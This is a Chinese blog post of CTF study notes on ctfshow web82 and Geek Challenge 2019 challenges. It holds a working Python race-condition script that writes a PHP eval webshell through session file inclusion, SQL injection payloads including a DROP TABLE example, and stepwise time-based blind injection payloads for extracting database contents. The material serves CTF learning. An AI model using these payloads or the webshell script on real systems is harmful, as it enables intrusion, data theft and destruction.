时间盲注

最新推荐文章于 2024-07-13 10:38:18 发布
最新推荐文章于 2024-07-13 10:38:18 发布
阅读量75 收藏
点赞数
文章标签: web sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74228275/article/details/131694759
版权

目录

ctfshow web82 

​编辑 sql语句中1' or ' 1 '=' 1的意思

时间盲注

相关函数

注入原理:

相关步骤

[极客大挑战 2019]Secret File

[极客大挑战 2019]LoveSQL

[极客大挑战 2019]Knife

ctfshow web82 

参考:ctfshow 文件包含_ctfshow文件包含_安好.791的博客-CSDN博客

import requests
import io
import threading
 
url='http://08d4a04e-19b3-4049-8a81-e9c6226eee2f.challenge.ctf.show:8080/'
#设置PHPSESSID的值
sessionid='ctfshow'     
data={"1":"file_put_contents('/var/www/html/tao.php','<?php eval($_POST[2]);?>');"}
 
 
#为了进行条件竞争,需要一边写一边读
 
#进行上传文件时需要post传递名为PHP_SESSION_UPLOAD_PROGRESS值为一句话木马
def write(session):
	fileBytes = io.BytesIO(b'a'*1024*50)          #生产一个50k的文件
	while True:
		response=session.post(url,
			data={'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'},
			cookies={'PHPSESSID':sessionid},
			files={'file':('ctfshow.jpg',fileBytes)}    #设置文件名字和内容
			)
 
 
 
#读取session文件,这里文件为/tmp/sess_ctfshow
 
def read(session):
	while True:
		response=session.post(url+'?file=/tmp/sess_'+sessionid,data=data)
		response2=session.get(url+'tao.php');
		if response2.status_code==200:
			print('++++++++++++++++++++')
		else:
			print(response2.status_code)
 
 
 
if __name__=='__main__':
 
	#开启多线程进行竞争	
	evnet=threading.Event()
	with requests.session() as session:			
		for i in range(20):
			threading.Thread(target=write,args=(session,)).start()
		for i in range(20):
			threading.Thread(target=read,args=(session,)).start()
	evnet.set()

sql语句中1' or ' 1 '=' 1的意思

这个 SQL 语句可能是一条简单的注入攻击,意图是欺骗数据库执行者并让其执行恶意代码。

具体来说,这个 SQL 语句包含了一个条件 ' 1 '=' 1',它总是成立(因为 1 等于 1),因此可以被用作查询语句中的一个条件。在其他情况下,攻击者还可能会尝试使用类似的语句进行注入攻击,例如:

  • ' or 1=1 --: 这个语句使用 SQL 注释符 -- 让后面的内容被视为注释,从而使查询始终返回 true 条件,并忽略后面的任何语句。
  • '; DROP TABLE users; --: 这个语句使用分号和 SQL 注释符将两个 SQL 语句连接起来,第一个语句可能是合法的查询语句,而第二个语句则是删除 users 表的语句,攻击者试图利用这个语句来删除数据库中的表。

为了避免 SQL 注入攻击,应该对用户输入进行严格的验证和过滤,并使用参数化查询或预处理语句来执行 SQL 命令。这样可以确保输入的数据不会被误解释为 SQL 命令的一部分,从而防止注入攻击。

时间盲注

在 SQL 语句中,没有 sleep() 函数可以直接使用。然而,在某些情况下,攻击者可能会利用数据库的一些漏洞或注入攻击技术,在 SQL 查询中注入类似 SLEEP(5) 的语句来实现延迟效果。

具体来说,攻击者可能会将类似 1; SELECT SLEEP(5); -- 这样的 SQL 查询语句注入到目标应用程序中,以此来使查询执行停顿 5 秒钟。这是因为在这个查询语句中,SELECT SLEEP(5) 只是一段注释后面的无效代码,而前面的 1 条件总是为 true,从而让整条查询语句执行成功。

时间盲注:主要是利用页面响应时间延时来判断

相关函数

sleep(n):延迟n秒

benchmark(count,expr):可测试某些特定操作的执行速度。count指的是执行次数,expr表达式,表示重复计算表达式count次,评估执行表达式的效率。

benchmark函数只有在查询有结果时,才会执行产生延时。

expr表达式必须返回是单个值

if(condition,expr1,expr2):判断函数,如果condition为真,则expr1,否则执行expr2,使用该函数辅助盲注判断。

注入原理:

借助延迟时间函数和判断函数,判断猜测的表达式的值是否正确,正确则延时响应,否则不延时响应

相关步骤

id=1' and if(1=1,sleep(3),1)--+

 说明if后被执行了,延时了3秒

说明if后没被执行

1' and if(length(database())=1,sleep(3),1)--+

数据库的长度从1开始试,最后发现数据库的长度为8

 然后

1' and if(ascii(substr(database(),1,1)) = 115,sleep(3),1) --+

尝试利用ascii值得到数据库名称。

1' and if((select count(table_name) from information_schema.TABLES WHERE TABLE_SCHEMA='security') = 1,sleep(3),1)--+

一个一个的尝试得到表的个数。

length((select table_name from information_schema.tables where table_schema='security')) = 猜测的数据表名的长度值

 ascii(substr((select table_name from information_schema.tables where table_schema= 'security' limit 1),1,1)) = 猜测的数据表名某一位字符的ASCII码值

(select count(*) from information_schema.columns where table_schema='security' and table_name = 'emails') = 猜测的数据表的字段个数值 

length((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 1)) = 猜测的数据表某个字段的长度值 

 ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 1 offset 0),1,1)) = 猜测数据表名某个字段的ASCII码值

(select count(1) from security.emails) = 猜测的数据表的字段的个数值

这个 SQL 查询语句的作用是统计 security.emails 表中的记录数量,并返回结果。

具体来说,这个查询语句使用了 SELECT COUNT(1) 的语法。COUNT() 是一个聚合函数,它用于对指定的列进行统计。而在这个语句中,使用了 COUNT(1) 的形式,其中的 1 可以是任何非 NULL 值,因为 COUNT() 函数只会对非 NULL 的值进行计数。因此,在这个查询语句中,COUNT(1) 表示对表中所有的行进行计数。

需要注意的是,虽然在实际的查询过程中,使用 COUNT(*)COUNT(1) 都可以得到相同的结果,但是在某些数据库系统中,两者的执行效率可能不同。一般来说,使用 COUNT(1) 更快一些,因为它只需要进行简单的整数计算,而不需要读取表中的数据。

 length((select * from security.emails limit 1 offset 0)) = 猜测的数据表字段的长度值

 ascii(substr((select security.emails limit 1 offset 0), 1, 1)) = 猜测的数据表字段值的某个字符的ASCII码值

以上是手工爆破,推荐使用脚本或工具。

[极客大挑战 2019]Secret File

先查看页面源代码,发现访问一下。

 

点一下,然后抓个包,发现另一个php文件。

 <html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

根据源码,我们不能通过目录穿越,也不能出现tp,input,data等字符

base64解密

[极客大挑战 2019]LoveSQL

按sql注入的流程操作:
1.测试有多少字段
测试每个字段对应的内容
2.爆出数据库名
3.爆出数据库里的表
4.爆出表的列名
5.爆出所有数据

[极客大挑战 2019]Knife

 

 

Serendipity~~~~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
mysql 时间盲注_MySQL手注之时间盲注
weixin_39928233的博客
01-19 827
时间盲注(延迟):没有任何回显点 在页面中输入任何内容都会返回同一个页面内容的 就可以尝试使用延迟盲注时间盲注常用的函数:if函数: if(Condition,A,B)含义: 如果Condition 成立,执行A,则Bsubstr函数:含义:截取字符串。subster(string, start, length)从string的start位开始截取len个字符ascii函数: ascii(ch...
基于时间盲注
d59hao的博客
07-21 196
(注意):sleep 函数是只要存在一个满足条件的行就会延迟指定的时间,比如sleep(5),但是实际上查找到两个满足条件的行,那么就会延迟10s,这其实是一个非常重要的信息,在真实的渗透测试过程中,我们有时候不清楚整个表的情况的话,可以用这样的方式进行刺探,比如设置成 sleep(0.001) 看最后多少秒有结果,推断表的行数。另一件需要考虑的事情是你注入的延迟时间。对于基于时间盲注来说,我们构造的语句中,包含了能否影响系统运行时间的函数,根据每次页面返回的时间,判断注入的语句是否被成功执行。
SQL注入-时间盲注
dkxkl1314的博客
03-11 756
盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注时间忙住特性在页面中,不管用户输入什么,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。如下图不管我们输入什么,页面显示结果都是一样的1、判断是否存在注入2、获取数据库长度3、逐字猜解数据库名4、猜解表名数量5、猜解某个表名长度6、逐字猜解表名。
sql注入之时间盲注
weixin_46954909的博客
04-02 884
sql注入的整型字符型注入,联合注入,报错注入以及布尔盲注可参考,往期。
时间盲注练习
MD_YAN的博客
07-25 262
盲注时间盲注
时间盲注python脚本.zip
12-28
时间盲注是一种常见的Web安全漏洞,它发生在数据库查询过程中,攻击者通过判断SQL查询返回结果的时间差异来获取数据库中的信息。在本压缩包"时间盲注python脚本.zip"中,包含两个Python脚本文件:time_sql_post.py和...
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
SQL盲注利用工具
11-15
2. **时间盲注**:与延迟盲注类似,但不是通过延时函数,而是通过精确计算查询执行的时间差异来获取信息。例如,使用IF()或CASE WHEN...THEN...END语句,根据不同的结果路径来改变查询执行的时间。 3. **基于字符的...
注入工具盲注猜解工具
02-24
注入工具盲注猜解工具 ===配置文件Inject.ini=== 先贴出代码再说明: ------------------------------------- [url]手工猜字符语句完整URL 没有特殊字符过滤的语句: http://www.xxx.net/list.asp?id=286 and 0<>...
如何解决 PostgreSQL 中由于索引不当导致的性能下降问题?
技术笔记
07-12 468
比如说,有一个订单表,其中“订单日期”这个列经常被用于按时间范围查询订单,但却没有为其创建索引,这就会导致数据库在查询时需要遍历整个表,极大地降低了查询速度。命令,我们可以查看查询的执行计划。再举一个例子,如果我们发现某个表上存在多个类似的索引,比如“idx_age_1”和“idx_age_2”,并且它们的定义几乎相同,这时候就可以考虑删除其中一个冗余的索引,以减少维护成本和提高性能。然而,就像任何复杂的系统一样,它也可能会遇到性能方面的挑战,其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。
【postgresql】视图(View)
一个写了10年bug的程序员日常笔记。
07-10 552
PostgreSQL 中的视图(View)是一种虚拟表,其内容由 SQL 查询定义。视图可以简化复杂的 SQL 操作,使得用户能够以一种更直观、更易于理解的方式来访问和操作数据。PostgreSQL 视图是只读的,因此可能无法在视图上执行 DELETE、INSERT 或 UPDATE 语句。但是可以在视图上创建一个触发器,当尝试 DELETE、INSERT 或 UPDATE 视图时触发,需要做的动作在触发器内容中定义。
[高频 SQL 50 题(基础版)]第一千七百五十七题,可回收且低脂产品
weixin_45201305的博客
07-10 274
low_fats 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品是低脂产品,'N' 表示不是低脂产品。recyclable 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品可回收,而 'N' 表示不可回收。没什么难度,作为基础题五十题的第一题练手,现在也开始陆续写一些SQL,作为记录,和leetcode一起,大家都加油。编写解决方案找出既是低脂又是可回收的产品编号。是该表的主键(具有唯一值的列)。
MySQL 进阶(三)【SQL 优化】
最新发布
梦想是动物管理员
07-13 658
MySQL SQL 优化
SQL面试题-留存率计算
xiao4816的博客
07-07 347
计算的是整段时间范围内,每一天为基准的所有的留存1、2、7天的用户数。计算的是用户首次登陆时间为基准时间,计算该基准时间之后的n日留存率。方法一的优势是可以一次性计算出,每天的不同时间范围的留存率。缺点:如果要计算n天留存需要增加代码量。但是不是很直观,并且计算量比较大。优点:代码直观好理解。
SQL Server设置端口:跨平台指南
招风的黑耳CSDN
07-09 601
在使用SQL Server时,设置或修改其监听的端口是确保数据库服务安全访问和高效管理的重要步骤。由于SQL Server可以部署在多种操作系统上,包括Windows、Linux和Docker容器等,因此设置端口的步骤和方法也会因平台而异。本文将为您提供一个跨平台的指南,帮助您在不同环境下设置SQL Server的端口。
NoSQL之Redis配置与优化
henanchenxuyuan的博客
07-11 1214
Redis(RemoteDictionaryServer,远程字典型)是一个开源的、使用C语言编写的NoSQL数据库。Redis 基于内存运行并支持持久化,采用 key-value(键值对)的存储形式是目前分布式架构中不可或缺的一环。Redis服务器程序是单进程模型,也就是在一台服务器上可以同时启动多个Redis 进程,而 Redis 的实际处理速度则是完全依靠于主进程的执行效率。若在服务器上只运行一个Redis 进程,当多个客户端同时访问时,服务器的处理能力是会有一定程度的下降;
Python 获取 SQL 指纹和 HASH 值
分享既学习
07-10 388
本文介绍一个提取 SQL 指纹的方法,就是将 SQL 语句的条件转换为?可用于脱敏和 SQL 聚类分析的场景。
PostgreSQL 中如何实现数据的增量更新和全量更新的平衡?
技术笔记
07-09 947
在数据库管理中,数据的更新操作是常见的任务。对于大型数据集或高并发的系统,选择合适的更新策略至关重要。增量更新和全量更新是两种常见的数据更新方式,如何在 PostgreSQL 中平衡这两种更新方式以确保数据的一致性、性能和可靠性是一个值得深入探讨的问题。
sqlmap命令行时间盲注
07-22
要在SQLMap命令行中执行时间盲注攻击,你可以使用`--technique`参数来指定使用时间盲注技术。下面是一个示例命令: ``` sqlmap -u "http://example.com/vulnerable.php?id=1" --technique=T ``` 在上述命令中,`-u...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值